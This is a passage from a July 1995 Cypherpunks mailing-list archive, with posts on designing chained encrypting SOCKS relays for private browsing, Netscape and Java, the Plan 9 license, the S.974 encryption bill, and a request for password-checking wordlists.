ports 1080 and 1180 and take the same actions a) b) or c) as appropriate. The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as UNIX daemon. The chain would be: - From a Windows client machine: Standard app -> Socksifier DLL by NEC -> encrypting relay -----> ---> Internet -----> decrypting relay -> server - From a Unix client machine: Socksified (recompiled) app -> encrypting relay ------> ---> Internet -----> decrypting relay -> server I'm assuming here that the encrypting relay should live close to machine (the same, or, at least on the same network) as the client app, and the decrypting relay close to the server. A single daemon could do both jobs, allowing chaining "a` la remailer", but I'm using here two different names for sake of clarity. Besides, the Windows version probably wouldn't need decrypting ability. Great advantage over Netscape: we could use EAY's free SSL implementation, and all the server administrators could generate and sign their own certificates. The present trouble with Netscape is that NS-Navigator refuses to accept certificates not signed as "Netscape compatible". Our en/decrypting relay could be more forgiving :-) As the SSL stuff built in Netscape would be unused, we could also improve the protocol (plugging security holes) ignoring compatibility issues. The administrators of secure servers should just advise the users to configure their local encrypting relays to pass through their decrypting relay (that would boil down to a line added to the encrypting relay configuration). It would all be beautifully modular, relatively simple to code (as someone else has done, or is doing, most of the hard work) and independent from big-brother certifying authorities. Comments? From trei Fri Jul 21 06:30:46 1995 From: trei (Peter Trei) Date: Fri, 21 Jul 95 06:30:46 PDT Subject: Netscape the Big Win Message-ID: <9507211330.AA26670@toad.com> TC May writes: > Frankly, one of the great boons of my current setup is that I can > completely get away from Unix tools and commands [...] >...my fingers are already forgetting the emacs commands! If I forget thee, O Emacs, let my right hand forget her cunning. If I do not remember thee, let my tongue cleave to the roof of my mouth; if I prefer not Emacs above my chief joy. (with apologies to the psalmist) Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From rsalz at osf.org Fri Jul 21 07:13:46 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 21 Jul 95 07:13:46 PDT Subject: Netscape the Big Win Message-ID: <9507211413.AA25887@sulphur.osf.org> > Well, X.509 for now. The Eastlake-Kaufman DNS Security work > (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt > --now proposed standard, awaiting an RFC number) promise to give us > a non-X.509 certification structure for the Internet. I have serious concerns about whether the DNS stuff will really scale. It's gonna blow out DNS server memory use, and the bigger packets means a *lot* more TCP (vs UDP) activity. /r$ From sdw at lig.net Fri Jul 21 07:37:14 1995 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 21 Jul 95 07:37:14 PDT Subject: And another thing... In-Reply-To: <199507202233.AA15359@tyrell.net> Message-ID: > > > As usual, one final question came to mind right after > sending the last message: > > Why is Java the next hot thing instead of Telescript? > > Was Telescript ever opened up for general use or was it > mainly used for AT&T's Personalink network? > > Phil Unless I'm mistaken, Telescript was part of General Magic's technology. Besides the language deficiencies, IMHO, they would release almost nothing to the general developers, much less a sample implementation to be ported. It's almost impossible to develop for: you need a souped up MAC, a developer PDA, etc... (I'm talking about Magic Cap (the OS) development in which I think the language was called Telescript.) Compared to a powerful Unix development environment (if and when it gets ported to Linux, HPUX, or SGI that I use...(no longer in a Sun shop), it really seem awful. It was also very buggy as late as mid last year. OTOH, I wrote a piece of software that interprets the raw async data from satellite and chops it into articles. (Reuters special feed for Magic Cap clients...) sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From lethin at ai.mit.edu Fri Jul 21 08:05:11 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Fri, 21 Jul 95 08:05:11 PDT Subject: Cyberporn on NPR today Message-ID: <9507211504.AA22710@grape-nuts> Talk of the Nation on NPR is having a call-in program this afternoon on the "pervasiveness of cyberporn". I think it's 1:00 or 2:00. Crypto-relevance... 4 horsepeople... From bostic at CS.Berkeley.EDU Fri Jul 21 08:05:21 1995 From: bostic at CS.Berkeley.EDU (Keith Bostic) Date: Fri, 21 Jul 95 08:05:21 PDT Subject: Plan9 press release followup Message-ID: <199507211504.LAA21881@python.bostic.com> It's been pointed out to me that the recent Plan 9 article does not match the licensing agreement. Nobody has any idea why the speaker didn't understand that the software community is likely to react badly to the phrase "any changes they make will become AT&T's property", but there is a rumor that they *may* have been a lawyer. ;-} As I understand it, the license is roughly as follows: + For $350, you get copies of the complete source and binaries for Plan 9. You can make this copy available internally to your company, i.e. NFS is okay as long as it's not on the Internet. + You agree to not resell it or provide a product or service based on it without reaching an agreement with AT&T first. + You agree that if you create a derivative work, you will license it to AT&T on a royalty-free basis. (I'm also told that some of the wording means that hardware specific things are excluded). There's nothing about modifications becoming the property of AT&T. The license is on the Web at http://plan9.att.com/plan9/shrink.html. --keith From jburrell at crl.com Fri Jul 21 08:41:25 1995 From: jburrell at crl.com (Jason Burrell) Date: Fri, 21 Jul 95 08:41:25 PDT Subject: House Waco Hearings Message-ID: <199507211541.KAA00499@crl.com> A non-text attachment was scrubbed... Name: not available Type: application/x-pgp-message Size: 26 bytes Desc: not available URL: From wb8foz at nrk.com Fri Jul 21 08:41:42 1995 From: wb8foz at nrk.com (David Lesher) Date: Fri, 21 Jul 95 08:41:42 PDT Subject: It had to happen... In-Reply-To: Message-ID: > >Has anyone caught this yet? From "No Such Agency" to having > >their own Web page... wow. > > > >http://www.nsa.gov:8080/ > They've been on the net for years. They were dockmaster (I do not remember > the domain) and were mentioned as such in Cuckoo's Egg. The address is > probably being run by the same section as dockmaster is/was (RTM Sr's > Group). Note that last I heard RM Sr. had retired & moved to New England. He is an interesting ....character... for lack of a better word. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From rjc at clark.net Fri Jul 21 08:45:24 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 21 Jul 95 08:45:24 PDT Subject: Netscape the Big Win In-Reply-To: <199507210121.VAA29893@bb.hks.net> Message-ID: <199507211545.LAA18993@clark.net> > > The answer is: integration. While TRN is a great newsreader, and > >Eudora's a great mail reader, etc, if I read a post in TRN or a message > >in Eudora, there is no hyperlinking. If I see a link or reference, > > If you used a Mac, all you had to do is click on the URL in your mailer, > newsreader, even some text editors, and the correct helper aplication will > open the URL. Yeah, but does it fire up 1 browser process everytime you click on it, or will it command an already running browser to follow the link? Secondly, this still doesn't solve the problem of interactive content and custom interfaces. With Java, you can build arbitrarily complex web interfaces with objects that can be linked together. An example of this is Sun's Spreadsheet Java App which is connected to a StockQuote app which runs a cute ticker tape scroller in the page. If you fill out the spreadsheet with stock symbols and amounts, it automagically updates your net-worth in real time, and simultanteously updates a line graph of your net worth in a window below. I can imagine a newsreader app which automagically pulls ratings down from a server and communicates with other apps in the same page. (plus, Tetris, Reversi, and Video Poker running within a web page with text and links wrapped around them is really cool!) -Ray From habs at warwick.com Fri Jul 21 08:47:39 1995 From: habs at warwick.com (Harry S. Hawk) Date: Fri, 21 Jul 95 08:47:39 PDT Subject: And another thing... In-Reply-To: Message-ID: <199507211546.LAA27197@cmyk.warwick.com> > (I'm talking about Magic Cap (the OS) development in which I think the > language was called Telescript.) I spent a lot of time talking to them.. While there was some telescript embedded in Magic Cap, Telescript was (and I think still is) a seperate Networking/Server product. /hawk From tcmay at sensemedia.net Fri Jul 21 09:09:53 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 21 Jul 95 09:09:53 PDT Subject: Netscape the Big Win Message-ID: At 1:42 AM 7/21/95, Lucky Green wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >In article , tcmay at sensemedia.net >(Timothy C. May) wrote: > >>Frankly, one of the great boons of my current setup is that I can >>completely get away from Unix tools and commands, away from my Unix shell >>account at Netcom, away from the arcane commands that vary from program to >>program, away from tin and elm and emacs...my fingers are already >>forgetting the emacs commands! >> >>(Those of you like Unix, fine. I agree it is useful for many things, so I'm >>not trying to debate Unix vs. the world. Just giving my perspective, and >>apparently the perspective of the many who are adopting the Web browsers as >>their "operating environments," insulated from the underlying cruft.) > >Is this the same T.C. May that used to argue vehemently that if it can't >be displayed on a VT52, it was no good? Did a space alien take over Tim? If you read my messages of last December, you'll see I said this on 15 December 1994: "I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net: "1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done. It meets the needs of 95% of us for 95% of our needs. "2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms. (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.)" I'd say this is very consistent with what I've been saying recently. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From tcmay at sensemedia.net Fri Jul 21 09:30:30 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 21 Jul 95 09:30:30 PDT Subject: Netscape the Big Win(dows) Message-ID: At 2:54 AM 7/21/95, Robert Hettinga wrote: >Tell us about it in 6 months, Tim, when you've grown out of Netscape. You >sound like someone who's totally enamored with their "-works" app. Most >people end up using more specialized apps when they hit the wall with >something which won't get all those "general purposes" taken care of... No, I don't use any of the "-works" apps, and I think the success of the Web speaks for itself...this is not a view I have just come to, as my recent message shows. And I'm not wedded to "Netscape" per se, though that particular environment has the current momentum. I've also used Mosaic and MacWeb to do much the same things, but find Netscape smoother. Out of curiousity, the phrase "grown out of Netscape," aside from the implied barb, means what? Just what am I missing and what do I need to "grow out of"? If, perchance, this is just what of those throwaway barbs, implying I move from fad to fad (as Fraering's post implied), you should know that I stuck with tin/elm/emacs/eudora for more than 3 years, as nothing obviously better--and worth the learning curve to switch to--had come along. (In the Mac domain I used other programs, none of them "-works" packages.) But, I'll tell you what, I *will* tell you about it in 6 months, whether or not I've grown out of Netscape! --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From hayden at krypton.mankato.msus.edu Fri Jul 21 09:38:42 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 21 Jul 95 09:38:42 PDT Subject: Something occured to me Message-ID: -----BEGIN PGP SIGNED MESSAGE----- About two weeks ago, there was some talk in here with regards to holding DC lawmakers crominally liable for passign bad laws. This was followed up with postins pointing out that you can't do that. However, this morning I remembered something. Whent he republicans took over the congress, they instidtued that Contract on America. One of the first laws that was passed (by both parties, I might add) was a law that made lawmakers abide by the same laws that "normal" people abide by. Does this change, in any fashion, the original idea? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMA+76DokqlyVGmCFAQEmdgQAsM6fAjnwWMDqCIHQG2HGp6ECY3ITexxr N8HFSTZUN7C34fPhAkTmUgalSKbv15Pcca8QXTutXTxhBAXsbTn8rCuQNhdjzigN pXl77a/KRkQqkMCED9DoRkemD3Pt4zPAtQDJbcHmSfokovUSr0q0cFZF8aveCmAB hEyRQEIFgAo= =Ha4N -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tcmay at sensemedia.net Fri Jul 21 09:50:08 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 21 Jul 95 09:50:08 PDT Subject: Netscape the Big Win Message-ID: At 3:45 AM 7/21/95, Robert A. Rosenberg wrote: >At 10:39 7/20/95, Timothy C. May wrote: >>To state an obvious non-crypto use of such "modules," why do all major word >>processing and page layout apps have their own "dictionaries"? Why do I >>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That >>there have not been "dictionary modules," for many and sundry reasons, is >>telling. (Before anyone mentions it, one can on the Mac use things like >>"Thunder" instead of the local dictionaries...this is not the same as a >>module usable by all programs, but instead is a user choice to bypass the >>local dictionaries. We could quibble for hours about whether this is in >>fact a universal module or not. > > >Since the support that Thunder 7 provides (with Wordprocessing and >Wordprocessing-Like Programs that it supports) is indistinguishable from >that provided by each program's integrated SpellChecker (along with T7 >providing a common set of "extra" User-Extendable Dictionaries as well as a >Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list >of incorrectly spelled words for "Replace All" so the user's personal >misspellings are automatically corrected without any interaction on his/her >part]), I think the ball is initially in the court of those who claim it is >not a universal module (admittedly only for those WPs it supports) to >explain why is does not function as one would function if it existed. Yes, I was the one who mentioned "Thunder." Should I justify why it is "not a universal module"? I won't waste our time. The essence, though, of having "parts" is that the suppliers of _other_ programs would not then have to supply the overlapping functions. In the case of Thunder, it may be useful and all (which is what I said when I mentioned it), but it's sufficiently obscure/unavailable that the makers of my various word processing programs and page preparation programs supply their own (and incompatible) dictionaries. This was my point. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From paul.elliott at hrnowl.lonestar.org Fri Jul 21 09:51:45 1995 From: paul.elliott at hrnowl.lonestar.org (Paul Elliott) Date: Fri, 21 Jul 95 09:51:45 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <199507201536.LAA05105@eff.org> Message-ID: <300f5b5a.flight@flight.hrnowl.lonestar.org> Many of the leaders of the major net civil liberties organizations have made statements concerning SB 974. They seem to agree that no action alert or coalition on SB 974 should be formed at this time. Some of the statements about SB 974. "Silly Bill" "not going anywhere" "subcommittee hearing not set yet" "premature" "inflammatory distraction" "campaign is unlikely to be successful" "the bill is doomed" I remain concerned about this bill and am not satisfied with the response to this bill. Exon was a silly bill, but it passed the Senate by a wide margin. How can a campaign to stop the bill not be successful if the bill is not going anywhere? Perhaps we need to have a success to gain momentum. The people on the subcommittee are going to be very important as the rest of the Senate will consider them to be the "experts". Since the net is esoteric to most people there will be a strong tendency to depend on the "experts". The best time to persuade these "experts" will be before they make any public statements about the bill in the subcommittee hearings and their positions are locked by pride not wanting to publicly change their positions. Thus we should be contacting these people now, and we may have a chance to nip SB 974 in the bud. By the way, what subcommittee was it sent to? I understand it was one of the subcommittees of Judiciary but no one said which one. Because there is no action alert, people do not know what States have the senators on the sub-committee. People from these States are the ones that should be especially encouraged to contact their Senators. In any case, it is clear that if any significant action on SB 974 will be taken at this time, the CYPHERPUNKS will have to do it. The major net civil liberties organizations have bowed out for now. Are there any cypherpunks out there who can help? Perhaps someone has writing skills that would be willing to write an action alert? Perhaps someone knows which subcommittee it was sent to? Since SB 974 hobbles our right to use encryption, the cypherpunks should be especially interested in opposing it. -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 From erc at khijol.intele.net Fri Jul 21 09:51:46 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Fri, 21 Jul 95 09:51:46 PDT Subject: "Cypherpunks Write Code" as a Putdown In-Reply-To: <9507210900.AA25179@snark.imsi.com> Message-ID: On Fri, 21 Jul 1995, Perry E. Metzger wrote: > sure that the IETF meeting in Dallas in a few months will have IPSP When and where will this be in Dallas? -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From rjc at clark.net Fri Jul 21 10:04:26 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 21 Jul 95 10:04:26 PDT Subject: Java (was Netscape: the big win) In-Reply-To: <199507202345.QAA16459@jobe.shell.portal.com> Message-ID: <199507211704.NAA12861@clark.net> > > So, what would be a "cypherpunk" thing you could do with Java? I know > I can use it to download little applets to my system to do animations. > What can it do to enhance my privacy? What would be the Java equivalent > of PGP? * Protocol Handler implement a remailer: URI that automagically communicates with remailers implement a pgp: URI that can decode pgp signed/encrypted text automagically. Use this to implement a server where users can post encrypted messages for other users, and the user, upon clicking the link, say pgp://rays_message_to_hal.html, gets the message automatically decoded. The encrypted text could even be HTML! implement an anonymous mailto: URI that works like mailto:, but uses an anonymous return block or blindserver automatically * Content Handlers implement a handler to decode PEM/RIPEM or any other kind of crypto MIME type implement a handler to check signatures, that way users could use a multipart message, the first part being a text/html or text/plain, the second part being a signature. The handler would automatically check the signature and notify the user that the content he is reading is authenticated (by beep, or icon, or title bar, whatever) * Applications Implement a Elm-like mailer app, complete with editor, that can send rfc822 normal mail, or, optionally, send thru any remailer chain at the click of a radio button Implement an object which can open a socket to key server or list of remailers server, get the list, display properties, etc The possibilities are endless. All of these things can be done in emacs, but unlike emacs, Java will be embedded into Netscape meaning the installed based of users will be much larger. -Ray From ben at reston.opnsys.com Fri Jul 21 10:09:44 1995 From: ben at reston.opnsys.com (ben at reston.opnsys.com) Date: Fri, 21 Jul 95 10:09:44 PDT Subject: Louie Freeh Message-ID: I was just listening to the G. Gordon Liddy Show, he was talking to a reporter for the American Spectator, which has a piece on our favorite FBI director Freeh. From the sound of the reporter the story is very damming, on everything from Waco to the entrappment of Malcolm X's daughter. Ben Hill From the land of the Freeh From jim at acm.org Fri Jul 21 10:15:14 1995 From: jim at acm.org (Jim Gillogly) Date: Fri, 21 Jul 95 10:15:14 PDT Subject: It had to happen... In-Reply-To: <9507210931.AA29736@snark.imsi.com> Message-ID: <199507211714.KAA19175@mycroft.rand.org> > "Perry E. Metzger" writes: > They [NSA] also have a Fortezza based web security system. One of their guys > was discussing some of that here at IETF. Are their Fortezza keys escrowed, or is this a "special run" of the chips without escrow? Jim Gillogly Sterday, 28 Afterlithe S.R. 1995, 17:14 From stewarts at ix.netcom.com Fri Jul 21 10:20:26 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 21 Jul 95 10:20:26 PDT Subject: Cyberporn on NPR today - 2pm EDT / 11am PDT Message-ID: <199507211718.KAA02958@ix7.ix.netcom.com> At 11:04 AM 7/21/95 EDT, Rich Lethin wrote: > >Talk of the Nation on NPR is having a call-in program this afternoon >on the "pervasiveness of cyberporn". I think it's 1:00 or 2:00. >Crypto-relevance... 4 horsepeople... TotN is on at 2:00 Eastern Time, 11:00 Pacific #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 From shamrock at netcom.com Fri Jul 21 10:21:32 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 21 Jul 95 10:21:32 PDT Subject: Netscape the Big Win Message-ID: At 11:45 7/21/95, Ray Cromwell wrote: >> > The answer is: integration. While TRN is a great newsreader, and >> >Eudora's a great mail reader, etc, if I read a post in TRN or a message >> >in Eudora, there is no hyperlinking. If I see a link or reference, >> >> If you used a Mac, all you had to do is click on the URL in your mailer, >> newsreader, even some text editors, and the correct helper aplication will >> open the URL. > > Yeah, but does it fire up 1 browser process everytime you click on it, or >will it command an already running browser to follow the link? If the helper app is not running it will start it, if it is running it will pass the URL to the already running app. Note that it doesn't have to be a browser. You can - and usually will - use separate apps for different types of URLs. -- Lucky Green PGP encrypted mail preferred. From hfinney at shell.portal.com Fri Jul 21 10:28:50 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 21 Jul 95 10:28:50 PDT Subject: Netscape the Big Win Message-ID: <199507211727.KAA06527@jobe.shell.portal.com> From: Enzo Michelangeli > On Thu, 20 Jul 1995, Hal wrote: > > That is why I am working on the proxy approach. Any browser should be > > able to use enhancements supplied in this way. Netscape is the big name > > this year, who knows who it will be next year. As long as IP > > connectivity is available a proxy can get into the stream and apply > > enhancements. > > I still maintain that an approach based on SOCKS would be more flexible, > adaptable to any TCP-based application. Here's what I'm thinking about: I agree with this general approach, but I looked into it in some detail, and SOCKS has a fatal flaw for my purposes: the address to connect to is passed as an IP 32-bit address. That means the software on the PC has to do the DNS lookup. And *that* means that the ultimate site being connected to is revealed. One of my goals is to protect the secrecy of the sites that a person is browsing. If an in-the-clear DNS lookup is done for each site that will hardly be effective, even if the actual connection request is encrypted. An eavesdropper on the internet will be able to observe the DNS lookup traffic. Now SOCKS V5 is going to change this; it allows the proxy to receive the request as a hostname rather than an IP address. So no DNS lookup is necessary by the client. Conceivably a modified winsock such as Enzo is suggesting could use that protocol, although it is not really stable yet. Also, I don't know how easy it is to intercept winsock calls and modify them in this way. So the proxy I have written works using the HTML proxy hook rather than the SOCKS hook. > 1. Windows apps: a general purpose socksifier, intercepting Winsock API > calls by *unmodified* applications and opening a single TCP connection to > the port 1080 of a sockd server. The good news is: some good folks at NEC > are already working at this project, and are looking for beta-testers. This sounds very good if it already is almost working. The TCP connection which is opened would have to be to a server on the local machine, so it would be important that the software support that. Also, the local SOCKS relay would of course not want its winsock calls to be intercepted and translated in this way, so there would need to be some alternative way to access "vanilla" winsock. Can you give any more information on the NEC work? > 2. A "SOCKS en/decrypting relay": a sockd server that, on a > per-site/per-port basis depending on a configuration file, may either > a) open TCP connections on behalf of its clients; > b) relay a plain SOCKS connection to a remote peer; > c) open a SSL connection to a remote peer on, say, a port 1180 reserved > for "SSL-ized SOCKS" connections) > Of course, that beast should also listen at the ports 1080 and 1180 and > take the same actions a) b) or c) as appropriate. For chaining purposes you would connect to the relay on the net on the secure port and request a TCP connection (not a SOCKS connection) to the second relay in the chain at its secure port. Then you negotiate a secure connection from your home PC to that second relay so that the traffic you send to it won't be visible to the first relay. Once that is done you send a SOCKS request to that second relay to connect to the next machine in the chain. So really only function (a) is needed for the relays on the net. The relay on the PC needs to be able to do (c), but more importantly it needs to be able to set up encryption chains, where every outgoing packet is nestedly encrypted, with the outermost encryption for the first relay in the chain, the next layer for the next relay, and so on. Each relay decrypts and strips off one layer, then passes the remaining raw data through. This way no one relay knows who is talking to whom or what they are saying. The reverse happens for return packets. > The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as > UNIX daemon. I have written a simple dummy relay for winsock and it requires a pretty different programming style than for Unix. Netscape has a habit of firing off a bunch of requests at once, so it has to be extremely asynchronous. For Windows this means you get a windows message every time a packet arrives and use non-blocking I/O. In Unix this is usually handled by forking a new process to handle each independent connection. Non-blocking I/O can be used in Unix but I don't think there is a non-blocking connect as there is in Windows. Maybe Windows 95 will allow a more Unix-style communication model, though. Should the proxy require Windows 95, or will Windows 3 still be in widespread use for another year or two? Also IMO the requirements for the Internet relay are pretty different than for the Windows relay. The Internet relay needs only to be able to decrypt/encrypt on the port where the request comes from while sending plain data the other way. It needs a config file so the owner can control what kinds of outgoing TCP connections can be done. The Windows one needs to be able to do nested encryption (if chains will be allowed eventually), to set up chains, etc. So for these reasons I am inclined to think that the two relays would be separate programs. > The chain would be: > > - From a Windows client machine: > > Standard app -> Socksifier DLL by NEC -> encrypting relay -----> > ---> Internet -----> decrypting relay -> server > > - From a Unix client machine: > > Socksified (recompiled) app -> encrypting relay ------> > ---> Internet -----> decrypting relay -> server > > I'm assuming here that the encrypting relay should live close to machine > (the same, or, at least on the same network) as the client app, and the > decrypting relay close to the server. A single daemon could do both jobs, > allowing chaining "a` la remailer", but I'm using here two different > names for sake of clarity. Besides, the Windows version probably wouldn't > need decrypting ability. The Windows version would need to decrypt incoming data; you don't want that coming in the clear. > Great advantage over Netscape: we could use EAY's free SSL implementation, > and all the server administrators could generate and sign their own > certificates. The present trouble with Netscape is that NS-Navigator > refuses to accept certificates not signed as "Netscape compatible". Our > en/decrypting relay could be more forgiving :-) The other problem with Netscape SSL is that it will only open secure connections to URL's marked "https://". Similarly SHTTP has a special URL "shttp://". There is no provision in either one to open a secure connection to "http://". A relay proxy would allow all connections to be encrypted between the PC and one or more relays. I am a little unclear on the certificate situation. As we saw with the PGP key servers before RSAREF PGP existed, RSA put pressure on these public sites which they saw as contributing to the use of infringing software. Similarly having a certificate created by infringing software might be seen as illegal, even if RSAREF was actually used for the handshaking in the protocol. Server operators are quite vulnerable to threatening letters from RSA. Another problem with RSAREF is that it does not allow you to exchange a session key using RSA encryption in a straightforward manner. The entry points you have legal access to choose a random session key, PK encrypt it, send it, and then encrypt the message using that session key with DES or 3DES. However I notice that SSLREF calls undocumented entry points like RSAPrivateDecrypt and RSAPublicEncrypt. I am not sure how they are able to do this. Maybe they got special permission from RSA. I don't know whether the SSLEAY library would be able to do this without such special arrangements. > As the SSL stuff built in > Netscape would be unused, we could also improve the protocol (plugging > security holes) ignoring compatibility issues. Yes, really there is no need to make it be SSL specifically except for the fact that it is an explicit protocol for which libraries exist. > The administrators of > secure servers should just advise the users to configure their local > encrypting relays to pass through their decrypting relay (that would boil > down to a line added to the encrypting relay configuration). > It would all be beautifully modular, relatively simple to code (as someone > else has done, or is doing, most of the hard work) and independent from > big-brother certifying authorities. Yes, I think the overall approach is very promising. Perhaps my desire for chaining is too ambitious for a first attempt. The transparent intervention of SOCKS that you describe would be very nice if that is available soon. One other problem is the risk taken by people running the relay servers on the net. These could be used to launder connections by hacker / cracker types. So probably only a limited set of outgoing ports would be permitted, say, 80 and 1080 which are the most common http ports. This would restrict the utility of the SOCKS approach for other uses like secure telnet, unfortunately. Hal From gorkab at sanchez.com Fri Jul 21 10:30:34 1995 From: gorkab at sanchez.com (It's supposed to crash like that.) Date: Fri, 21 Jul 95 10:30:34 PDT Subject: big word listing Message-ID: <00993AF518E527C0.00011F64@sanchez.com> As a security measure, I am trying to get a massive dictionary of words together, and each time a user changes his/her password, it checks the list to see if the password is in it. My question is, are there any pre-built lists of this nature? I am currently only using a spelling dictoinary, and would like somthing a little bigger. From schampeo at imonics.com Fri Jul 21 10:34:03 1995 From: schampeo at imonics.com (Steven Champeon - Imonics Development) Date: Fri, 21 Jul 95 10:34:03 PDT Subject: Netscape the Big Win Message-ID: <9507211733.AA17337@fugazi.imonics.com> | From owner-cypherpunks at toad.com Fri Jul 21 13:24:22 1995 | From: Ray Cromwell | Subject: Re: Netscape the Big Win | | > If you used a Mac, all you had to do is click on the URL in your mailer, | > newsreader, even some text editors, and the correct helper aplication will | > open the URL. | | Yeah, but does it fire up 1 browser process everytime you click on it, or | will it command an already running browser to follow the link? You can't have multiple processes running on a Mac. (Unless the application has a different name -- for example, you *can* have two different copies of the Netscape application, named "NS1" and "NS2", set as the default "helpers" for a) news and b) HTTP, should you want to do that...) What ICeTEe does is send an Open AppleEvent to the browser application. If it is running, it responds by opening the URL in the browser. If the browser isn't running, it starts the browser and then opens the URL. The INIT (extension) patches the System "TextEdit" routines, which are used in most apps with limited need for text processing. The name of the INIT comes from its authors, who wrote "InternetConfig", and because it patches "TextEdit". This isn't to say that Java isn't cool :-) Steve From adam at bwh.harvard.edu Fri Jul 21 10:41:27 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 21 Jul 95 10:41:27 PDT Subject: big word listing In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com> Message-ID: <199507211738.NAA01082@spl.bwh.harvard.edu> | As a security measure, I am trying to get a massive dictionary of words | together, and each time a user changes his/her password, it checks the list to | see if the password is in it. My question is, are there any pre-built lists of | this nature? I am currently only using a spelling dictoinary, and would like | somthing a little bigger. Look on coast.cs.purdue.edu in the password/Crack areas. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From wb8foz at nrk.com Fri Jul 21 10:55:36 1995 From: wb8foz at nrk.com (David Lesher) Date: Fri, 21 Jul 95 10:55:36 PDT Subject: Cyberporn on NPR today In-Reply-To: <9507211504.AA22710@grape-nuts> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Talk of the Nation on NPR is having a call-in program this afternoon > on the "pervasiveness of cyberporn". I think it's 1:00 or 2:00. > Crypto-relevance... 4 horsepeople... That will be Talk of the Nation -- Science Friday. You can do lots worse than Ira Flato, the host. But I expect it to focus on the technology questions, not the shrill "Save our children from the plague..." hysteria. - -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMBAObxqU5+N/mI7JAQHpEQP+KNyxSKOylBZKtLeCzhFYTWjpKE1lu25b tGbBxwII5O4Ba5/g1pCYCWYkwFI5ZvXJg4xEu6XdKE8lz3HwSSl6lMXGDLtqTmYF 